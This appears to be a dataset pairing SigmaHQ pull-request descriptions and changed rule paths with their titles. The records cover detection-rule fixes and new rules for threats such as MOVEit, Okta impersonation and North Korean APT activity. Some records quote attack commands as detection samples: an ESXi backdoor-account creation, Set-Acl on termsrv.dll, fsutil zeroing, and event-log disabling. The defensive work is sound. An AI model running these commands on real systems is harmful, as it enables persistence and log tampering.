((EventID="13" ((EventType="SetValue" TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\*" TargetObject="*\\Enabled" Details="DWORD (0x00000000)")) NOT (((Image="*\\Windows\\system32\\wevtutil.exe")) OR ((Image="C:\\Windows\\winsxs\\*" Image="*\\TiWorker.exe")) OR ((Image="C:\\Windows\\System32\\svchost.exe" (TargetObject="*\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsof …
```
=> 2f78da12-f7c7-430b-8b19-a28f269b77a3 fix null list in filter

rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml
Get FP same as in 64e8e417-c19a-475a-8d19-98ea705394cc
I use  the same syntax
```xml
<EventData>
<Data>Available</Data> 
<Data>None</Data> 
<Data>NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.963 HostId=3d224b46-16cd-46e2-87da-605743039dbc HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1'; EngineVersion=5.1.22621.963 RunspaceId=d3459531-4ea2-4098-a922-4dfc75cf4b88 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=</Data> 
</EventData>
```
=> d7326048-328b-4d5e-98af-86e84b17c765 Powershell FP

rules/windows/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml
fix the image's extension from dll to exe
no
4688 or 1
=> fix: image name

rules/web/product/apache/web_apache_segfault.yml
Correct "creashing" to "crashing" in the description field in web_apache_segfault.yml
=> Correct rule description in web_apache_segfault.yml

rules/windows/image_load/image_load_dll_vssapi_susp_load.yml, rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml, rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml, rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml, rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml, rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell.yml
FPs from different environments
[fix: remove leading whitespace](https://github.com/SigmaHQ/sigma/commit/689ef52c6673f4102b4928220df074b8d3c4f5a1)
there can be double quotes which is a common pattern when using the command flag
=> fix: FPs from different environments

rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml
Update Script Block Text When Run Phant0m Script, include:
- Runtime.InteropServices.UnmanagedType
- Reflection.Emit.CustomAttributeBuilder
- 
N/A
CommandInvocation(New-Object): "New-Object"
ParameterBinding(New-Object): name="TypeName"; value="System.Reflection.AssemblyName"
ParameterBinding(New-Object): name="ArgumentList"; value="PowerWalker"
Context:
Severity = Informational
Host Name = ConsoleHost
Host Version = 5.1.14393.4583
Host ID = 74280e4d-f5c1-4be1-8c48-ca6edaaa06cf
Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Engine Version = 5.1.14393.4583
Runspace ID = 32d186d3-6bdd-4933-b7c4-3de50fdad92a
Pipeline ID = 59
Command Name = New-Object
Command Type = Cmdlet
Script Name = C:\Users\administrator.BLUE\Desktop\phantom.ps1
Command Path = 
Sequence …
=> Update Script Block Text When Run Phant0m Script

rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml, rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml, rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml, rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml, rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml, rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml, rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml
This PR updates Event IDs of firewall based rules 
Did some research that I will publish soon and found that Win11 uses new set of EIDs for older events.
N/A
N/A
=> feat: update firewall rules event ids

rules/windows/builtin/application/msmq/win_msmq_corrupted_packet.yml, rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml
Added new rules related to potential exploitation of CVE-2023-21554 based on https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
N/A
N/A
N/A
=> feat: new rules related to queuejumper

rules/windows/process_creation/proc_creation_win_malware_rorschach_ransomware_activity.yml
small typo fix.
Fixes incorrect image name for `wevtutil.exe`.
=> typo in wevtutil image name

rules/windows/dns_query/dns_query_win_susp_ipify.yml, rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml
This PR adds enhances coverage of 2 rules
- Office susp child images
- DNS request to IP services API
N/A
N/A
N/A
=> feat: small updates

rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml, rules/windows/process_creation/proc_creation_win_hktl_certify.yml
=> Fix FPs found in testing env

rules-emerging-threats/2023/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml
I think that `PaperCut-Print-Management-Exploitation` rule `condition` block has typo, so I fixed it.
(I'm sorry if I misunderstood the specification of sigma's `condition` block...)
`PaperCut-Print-Management-Exploitation` rule has `selection_1` and `selection_2` in `detection` block,
https://github.com/SigmaHQ/sigma/blob/0a725ebfb7b0b9785bac9f3e2b240bb7b9b81821/rules-emerging-threats/2023/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml#L15-L25
But the `condition` block has neither `selection_1` nor `selection_2` as follows.
(My understanding is that the string in the `condition` block will detect by `exact match`. (not by `partial match`))
https://github.com/SigmaHQ/sigma/blob/0a725ebfb7b0b9785bac9f3e2b240bb7b9b81821/rules-em …
=> fix: modify PaperCut exploitation rule condition

rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml, tests/test_rules.py
using relative paths offers more flexibility in downstream projects
also fixing a typo in a field name
=> use relative paths in rules test

rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml, rules/windows/process_creation/proc_creation_win_curl_fileupload.yml
Modified rules to enable a case sensitive detection. Curl have two arguments "-f" and "-F" with different role.
I have implemented theses rules and had some false positives, 19k :( .
=> Proc creation susp curl fileupload modified

rules/windows/network_connection/net_connection_win_google_api_non_browser_access.yml
Created a rule to detect possible command and control activity associated with offensive tools utilizing the googleapis.com endpoints. In particular the use of the new GC2 framework that has been leveraged by current threat actors such as APT41.
Tested in uncoder.io and the resulting kusto query language was used in Microsoft Defender for Endpoint  (MDE) which detected the activity.
Thanks for your contribution. Please make sure to fill the contents of this template with the necessary information to ease and speed up the review process. PLEASE DO NOT DELETE ANY SECTION OR THE CONTENT OF THE TEMPLATE.
New rule was created to detect suspicious activity associated with googleapis.com endpoints which could indicate a possible command and control channel leveraging google sheets and drive. …
=> net_connection_win_google_api_non_browser_access.yml

rules/windows/image_load/image_load_dll_vssapi_susp_load.yml
=> fix: remove erroneous whitespace

rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
More Backstab hack tool imphashes
All 3 cover 95%+ of all backstab samples on VT
=> more backstab hashes

rules/windows/file/file_event/file_event_win_homoglyph_filename.yml, rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml, rules/windows/process_creation/proc_creation_win_homoglyph_cyrillic_lookalikes.yml
Adds two rules detecting the presence of homoglyph characters which look identical to ascii characters but use Cyrillic, Greek, and/or Kurdish characters. Inspired by the SocGholish section of the RedCanary 2023 Threat Detection report which mentioned SocGholish distribution using homoglyph substitution for common browser update names.
Contains one process creation and one file event rule, looking for these homoglyph characters in either command lines or target filename values. I've only considered what I consider "perfect" homoglyphs, that (to my eye at least) look identical to their ASCII counterparts.
=> Potential Homoglyph Attack Rules

rules/windows/image_load/image_load_side_load_solidpdfcreator.yml
This PR adds new rule related to DLL sideloading based on https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
N/A
N/A
N/A
=> feat: new rule related to possible solidpdfcreator.dll sideloading

rules/windows/image_load/image_load_side_load_from_non_system_location.yml
FP with CheckPoint SmartConsole
=> fix: FP with CheckPoint SmartConsole

rules-emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml
Fixing a small typo for the filter in snake malware werfault rule
there was an extra 's'
=> Fix typo on ET Snake malware filter

tests/test_logsource.py
This exception type is not handled and properly and in our environment with custom service types we were getting a failure on this test. Including the exclusion for `list_valid != None` resolves this.
No additional details, small change to the if statement.
N/A
N/A
=> Update test_logsource.py test_fieldname_case to exclude None type

rules/windows/image_load/image_load_side_load_goopdate.yml
Fix FP with goopdate dll sideloading rule
N/A
N/A
N/A
=> fix: fp with goopdate

rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml
Fixes a FP in prod env where no Image was set
=> fix: FP in prod env

rules/windows/dns_query/dns_query_win_susp_ldap.yml, rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml, rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml
=> fix: FPs in testing environment

rules/network/cisco/aaa/cisco_cli_clear_logs.yml
Fix logsource for cisco_cli_clear_logs
All the rule are `service: aaa` only
=> Fix cisco_cli_clear_logs logsource

sigma-schema.rx.yml
Missing fields in schema.
I noticed some missing fields while working on a schema for a different project. Did we exclude the date fields deliberately or unintentionally?
=> Additions to sigma-schema.rx.yml

rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml
=> fix: FP with opera

.github/ISSUE_TEMPLATE/false_positive_report.yml
Fixes a typo in the FP issue template. 
Change `uuid` to `id` in the FP template.
N/A
N/A
=> Change FP template to use `id` instead of `uuid`

rules-emerging-threats/2023/Exploits/MOVEit-Transfer-Unknown-Exploit/README.md, rules-emerging-threats/2023/Exploits/MOVEit-Transfer-Unknown-Exploit/file_event_win_exploit_other_moveit_transfer.yml
This PR update the MoveIT IOC rule
N/A
N/A
N/A
=> feat: update moveit exploitation ioc rule

rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/README.md, rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml, rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/web_cve_2023_34362_known_payload_request.yml.yml
This PR updates the MOVEit exploitation rules
N/A
N/A
N/A
=> feat: update MOVEit exploitation rules

rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml
Filters files that were deleted by one process but still are used by others. They seem (in some cases at least) to be moved to `C:\$Extend\$Deleted\` and lose their file extension
see: https://www.quora.com/What-is-the-Extend-deleted-directory-on-Windows
```
EventID: 4688
Provider_Name: Microsoft-Windows-Security-Auditing
Provider_Guid: {54849625-5478-4994-a5ba-3e3b0328c30d}
Version: 2
Level: 0
Task: 13312
Opcode: 0
Keywords: 0
TimeCreated_SystemTime: 2023-04-07T01:57:50.6237737Z
EventRecordID: 3236392
Correlation_ActivityID:
Execution_ProcessID: 4
Execution_ThreadID: 7356
Channel: Security
Computer: <host> Security_UserID:
SubjectUserSid: S-1-5-18
SubjectUserName: <user$>
SubjectDomainName: <domain>
SubjectLogonId: 0x3e7
NewProcessId: 0x5a4
NewProcessName: …
```
=> fix: exclude files that are marked for deletion

rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml, rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml, tests/test_rules.py
fixed typo in rule field ("related")
fixed typo in rule field ("related")
fixed typo in rule field ("related")
=> fix: typo in 'related' field

rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml
=> proc_creation_win_lolbin_gpscript Fix svchost FP

deprecated/windows/sysmon_mimikatz_detection_lsass.yml, rules/application/spring/spring_application_exceptions.yml, rules/linux/builtin/lnx_shell_clear_cmd_history.yml, rules/linux/builtin/lnx_shell_susp_commands.yml, rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml, rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml, rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml, rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml, rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml, rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml, rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml, rules/windows/image_load/image_load_susp_uncommon_image_load.yml, rules/windows/image_load/image_load_uipromptforcreds_dlls.yml, rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml, rules/windows/pipe_created/pipe_created_mal_namedpipes.yml, rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml, rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml, rules/windows/process_access/proc_access_win_lsass_memdump.yml, rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml, rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml, rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml, rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml, rules/windows/process_creation/proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml, rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml, rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml
Fixes for various 404 links in references
This PR fixes various 404 links in references.
The big contributors are the harmj0y blog which changed url structure and the cyberwardog blog which has removed various blog posts. I tried to follow convention by linking to the web archive version but I am also open to removing them if that makes more sense. There are a few other typo fixes and url changes.
N/A
N/A
=> Fix 404 links

rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml
```
IMAGE: C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE
MATCH_STRINGS: SetValue in EventType, \Software\Microsoft\Office\Excel\Addins\ in TargetObject
TARGETOBJECT: HKU\S-1-5-21-1099287793-557554941-2827812208-1009\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\FriendlyName
```
=> fix: FP found with excel

rules/windows/builtin/application/Other/win_av_relevant_match.yml, rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell.yml, rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml
=> fix: FPs found in testing env

rules/windows/process_creation/proc_creation_win_findstr_susp_parent.yml
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist
fe63010f-8823-4864-a96b-a7b4a0f7b929 is for lsass , so make a more generic one
```json
{
"SourceName": "Microsoft-Windows-Sysmon",
"ProviderGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Level": "4",
"Keywords": "0x8000000000000000",
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Hostname": "Windows.simu.local",
"TimeCreated": "2023-07-02T11:43:28.512Z",
"@timestamp": "2023-07-02T11:43:28.512Z",
"EventID": 1,
"Message": "Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2023-07-02 09:43:28.506\r\nProcessGuid: {cb4ada01-46c0-64a1-5609-000000002200}\r\nProcessId: 2004\r\nImage: …
```
=> Add proc_creation_win_findstr_susp_parent

rules/windows/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml
Fp found when check the rule agains last years logs
```csv
CreateRemoteThread detected: RuleName: technique_id=T1055,technique_name=Process Injection UtcTime: 2023-05-15 07:45:18.032 SourceProcessGuid: {4709cd9b-e30d-6461-ae05-000000006900} SourceProcessId: 9588 SourceImage: C:\Windows\System32\rundll32.exe TargetProcessGuid: {4709cd9b-e2e7-6461-2d05-000000006900} TargetProcessId: 11248 TargetImage: C:\Windows\explorer.exe NewThreadId: 6428 StartAddress: 0x00007FF8E4580660 StartModule: C:\WINDOWS\System32\KERNEL32.DLL StartFunction: LoadLibraryW SourceUser: NT AUTHORITY\SYSTEM TargetUser: xxx\xxx
```
```
CreateRemoteThread detected: RuleName: technique_id=T1055,technique_name=Process Injection UtcTime: 2023-04-03 09:58:33.555 SourceProcessGuid: {bc5a407d-db25-63fb-4e00-000000000900} …
```
=> fix: FP found in-the-wild

rules/cloud/aws/aws_iam_s3browser_user_or_accesskey_creation.yml
Adding Sigma rules outlined in the following blog post associated with named cloud-focused threat actor p0-LUCR-1 (aka GUI-vil): https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
Detects S3 Browser utility creating IAM User or AccessKey.
{
"eventVersion": "1.08",
"userIdentity": {
"type": "IAMUser",
"principalId": "redacted",
"arn": "arn:aws:iam::redacted:user/terraform",
"accountId": "redacted",
"userName": "terraform",
"accessKeyId": "AKIA*****"
},
"eventTime": "2023-04-18T15:05:27.0000000Z",
"eventSource": "iam.amazonaws.com",
"eventName": "CreateUser",
"awsRegion": "us-east-1",
"sourceIPAddress": "36.85.110.142",
"userAgent": "S3 Browser 9.5.5 <https://s3browser.com>",
"requestParameters": {
"userName": "sec_audit",
"path": "/"
},
"responseElements": {
"user": {
"arn": …
=> Permiso p0-LUCR-1 (aka GUI-vil)

rules/web/proxy_generic/proxy_ua_malware.yml
Just a small typo fix in an an inline comment. I was googling the malware and noticed it is called DragonOK not DargonOK
=> Fixed typo in comment

rules/windows/powershell/powershell_script/posh_ps_set_acl.yml, rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml, rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml, rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml
Detect when a powershell script set acl in windows folder or subfolder
Atomic test failled but no one should change ACL in windows in a daily live
`Set-Acl -Path "C:\Windows\System32\termsrv.dll" -AclObject $ACL`
=> Add posh_ps_set_acl

rules/windows/sysmon/sysmon_file_block_shredding.yml, rules/windows/sysmon/sysmon_file_executable.yml
Simple rule for sysmon 28 and 29 event 
=> Add Sysmon 28-29 rules

rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml
Check if  Windows Terminal Profile settings.json is modified
As the file is not monitored by default, it's difficult to get the FP possible
Rule 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 cover WindowsTerminal.exe as parent but did not cath the test.
=> Add file_event_win_susp_windows_terminal_profile

.github/workflows/known-FPs.csv, rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml, rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml, rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml, rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml, rules/windows/image_load/image_load_side_load_ccleaner_du.yml, rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml, rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml, rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml, rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml, rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml, rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml, rules/windows/process_creation/proc_creation_win_findstr_lsass.yml, rules/windows/process_creation/proc_creation_win_findstr_susp_parent.yml, rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml, rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml, rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml, rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml, rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml, rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml, rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml, rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml, rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml, rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml, rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml, rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml
This PR updates and add multiple rules
N/A
N/A
N/A
=> feat: new rules and updates

rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml, rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml
=> fix: FPs in rules

rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml
sorted the existing entries and added `perfmon.exe`
=> fix: FP with perfmon.exe

rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml
Fixing a potential typo in a service name.
Fixing a potential typo in a service name.
=> Fixing 1 service typo in proc_creation_win_susp_service_tamper.yml

.github/PULL_REQUEST_TEMPLATE.md
=> Update PULL_REQUEST_TEMPLATE.md - add changelog instead of detailed desc

rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
=> Added ART Test to proc_creation_win_cmdkey_recon.yml

rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml
=> Added ART Test to proc_creation_win_csc_susp_dynamic_compilation.yml

rules-emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_34362_report_creation.yml, rules-emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_34362_wermgr_creation.yml, rules-emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_34362_fake_wermgr.yml, rules/windows/file/file_event/file_event_win_new_src_file.yml, rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml, rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml, rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml
This PR adds new rules related to CVE-2023-36874 exploitation and updates old rules related to wermgr and others
- new: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
- new: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
- new: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
- new: Suspicious Execution Location Of Wermgr.EXE - split from 396f6630-f3ac-44e3-bfc8-1b161bc00c4e
- update: Potential Defense Evasion Via Rename Of Highly Relevant Binaries - enhanced child process list
- update: Suspicious Child Process Of Wermgr.EXE - update title
- fix: SCR File Write Event - update modifier
N/A
N/A
- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/s …
=> feat: add/update rules related to CVE-2023-36874

.github/PULL_REQUEST_TEMPLATE.md
chore: remove listing from changelog in PR template
chore: remove listing from changelog in PR template
=> chore: remove listing from changelog in PR template

rules/web/proxy_generic/proxy_webdav_search_ms.yml
there might be issues with backends that use stricter evaluation than what python implements for the IP utils
fix: Search-ms and WebDAV Suspicious Indicators in URL - use explicit CIDR notation for loopback
=> fix: use explicit CIDR notation for loopback

rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml
This pull request implements a new rule to detect Vmware ESXi account creation.
```
<14>2023-08-22T15:49:11Z ESXi.home shell[3707386]: [root]: esxcli system account add –-id malicious-account -–password test  -–password-confirmation test
```
=> Proc creation lnx esxcli user account creation

rules/windows/network_connection/net_connection_win_susp_epmap.yml
fix: Suspicious Epmap Connection - filter events that cannot be investigated anyway
=> fix: filter events that cannot be investigated anyway

rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml, rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml
Some rules logic can prevent pySigma to convert the rules (*Can't merge value lists 'ModifyingApplication' into one item due to different logical linking.*) . It happens when there are multiple times the same field with an `OR` condition : 
```yaml
detection:
selection:
- Field|contains:
- foo
- bar
- Field|contains:
- baz
```
Since it is an `OR` condition, the logic of the rules can be updated.
update: New Firewall Rule Added In Windows Firewall Exception List - update logic
update: Suspicious Scripting in a WMI Consumer - update logic
=> Sigma update rule logic

rules/windows/process_creation/proc_creation_win_fsutil_usage.yml
Add  `fsutil file [setzerodata] offset=<offset> length=<length> <filename>`
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file
update: Fsutil Suspicious Invocation - add setZeroData
https://any.run/report/b516cad7be16a528e5882afeb50caa7d0da310b60d2580fa16c0da0a52f938d9/f0b69213-b05c-4ecc-8485-ae46d5b8660b?_gl=1*wl7h2w*_gcl_au*Mzg1OTk2Njk4LjE2OTM2NzIzMzM.*_ga*MTQ1NDA1MDE3MS4xNjg1ODkzODc3*_ga_53KB74YDZR*MTY5NDI3Mzk1Ni4yMC4xLjE2OTQyNzQyNzAuNjAuMC4w
PID 3064
=> Update add setZeroData option to fsutil

rules/cloud/okta/okta_identity_provider_created.yml, rules/cloud/okta/okta_new_behaviours_admin_console.yml, rules/cloud/okta/okta_suspicious_activity_enduser_report.yml, rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml
Okta recently reported in [a blog post](https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection) a series of attacks against organisations using their service. Several of their TTPs could already be detected via existing Sigma rules, but several new rules were required to detect the activities described.
new: Okta Identity Provider Created
new: Okta New Admin Console Behaviours
new: Okta Suspicious Activity Reported by End-user
new: Okta User Session Start Via An Anonymising Proxy Service
=> Okta cross-tenant impersonation attack rules

rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell.yml
fix: Suspicious Elevated System Shell
=> Fix False Positive Found In Testing

rules/cloud/m365/microsoft365_disabling_mfa.yml
The word `Authentication` is misspelled in the `O365 Disable MFA` rule, which means it will never fire as the typo is also being used to match the operation in the O365 logs.
fix: O365 Disable MFA - fix `authentication` typo
=> fix: O365 Disable MFA - fix `authentication` typo

.github/workflows/sigma-test.yml, tests/check-baseline-local.sh
chore: add rules-emerging-threats to goodlog tests
=> chore: add rules-emerging-threats to goodlog tests

rules/windows/network_connection/net_connection_win_susp_epmap.yml
fix: Suspicious Epmap Connection - FP with unknown process
=> fix: FP with unknown process

.github/workflows/sigma-test.yml, rules-threat-hunting/windows/registry/registry_set/registry_set_office_trusted_location.yml, rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml, tests/check-baseline-local.sh
chore: add threat hunting rules to goodlog tests
=> chore: add threat hunting rules to goodlog tests

rules/cloud/aws/aws_sso_idp_change.yml
Create a new rule to detect changes to an AWS account's identity (authentication) provider. This is an uncommon and sensitive configuration change that should be monitored. Unexpected changes could be an indicator of persistence or privilege escalation activity.
new: AWS Identity Center Identity Provider Change
```json
{
"eventSource": "sso.amazonaws.com",
"eventName": "DisassociateDirectory",
}
```
```json
{
"eventSource": "sso-directory.amazonaws.com",
"eventName": "EnableExternalIdPConfigurationForDirectory",
}
```
=> Create AWS rule aws_sso_idp_change.yml

rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml
A simple update of the ATT&CK mapping for one of the rules. Namely an NTDSutil abuse rule. 
It stated an exection tactic, while I believe it should be a credential access. Specific technique mapping has been added as well. 
update: win_esent_ntdsutil_abuse - corrected ATT&CK mapping
=> Updating ATT&CK mapping to proper technique

rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml, rules-emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml, rules-emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml, rules-emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml, rules-emerging-threats/2021/Exploits/win_vul_cve_2021_41379.yml, rules-emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml, rules-emerging-threats/2022/Malware/Bumblebee/create_remote_thread_win_malware_bumblebee.yml, rules-emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml, rules-emerging-threats/2022/Malware/win_mssql_sp_maggie.yml
Promote experimental rules without update since 300 days to test
chore: Update level information for emerging-threats rules
=> chore: Update level information for emerging-threats rules

rules-threat-hunting/windows/file/file_delete/file_delete_win_zone_identifier_ads.yml, rules-threat-hunting/windows/file/file_event/file_event_win_susp_binary_dropper.yml, rules-threat-hunting/windows/file/file_event/file_event_win_webdav_tmpfile_creation.yml, rules-threat-hunting/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_csc_compilation.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_susp_compression_params.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_taskkill_execution.yml
chore: add missing detection.threat_hunting tag
chore: add missing detection.threat_hunting tag
=> chore: add missing detection.threat_hunting tag

rules-emerging-threats/2023/TA/3CX-Supply-Chain/README.md, rules-emerging-threats/2023/TA/Diamond-Sleet/README.md, rules-emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml, rules-emerging-threats/2023/TA/Diamond-Sleet/file_event_win_apt_diamond_sleet_indicators.yml, rules-emerging-threats/2023/TA/Diamond-Sleet/image_load_apt_diamond_sleet_side_load.yml, rules-emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml, rules-emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml, rules-emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml, rules-emerging-threats/2023/TA/Onyx-Sleet/README.md, rules-emerging-threats/2023/TA/Onyx-Sleet/file_event_win_apt_onyx_sleet_indicators.yml, rules/windows/image_load/image_load_side_load_from_non_system_location.yml
This PR adds new ET rules related to Diamond & Onyx Sleet activity as described in MS [report](https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/)
fix: Potential System DLL Sideloading From Non System Locations
new: Diamond Sleet APT DNS Communication Indicators
new: Diamond Sleet APT File Creation Indicators
new: Diamond Sleet APT DLL Sideloading Indicators
new: Diamond Sleet APT Process Activity Indicators
new: Diamond Sleet APT Scheduled Task Creation - Registry
new: Diamond Sleet APT Scheduled Task Creation
new: Onyx Sleet APT File Creation Indicators
N/A
N/A …
=> Onyx & Diamond Sleet APT AExploitation Activity

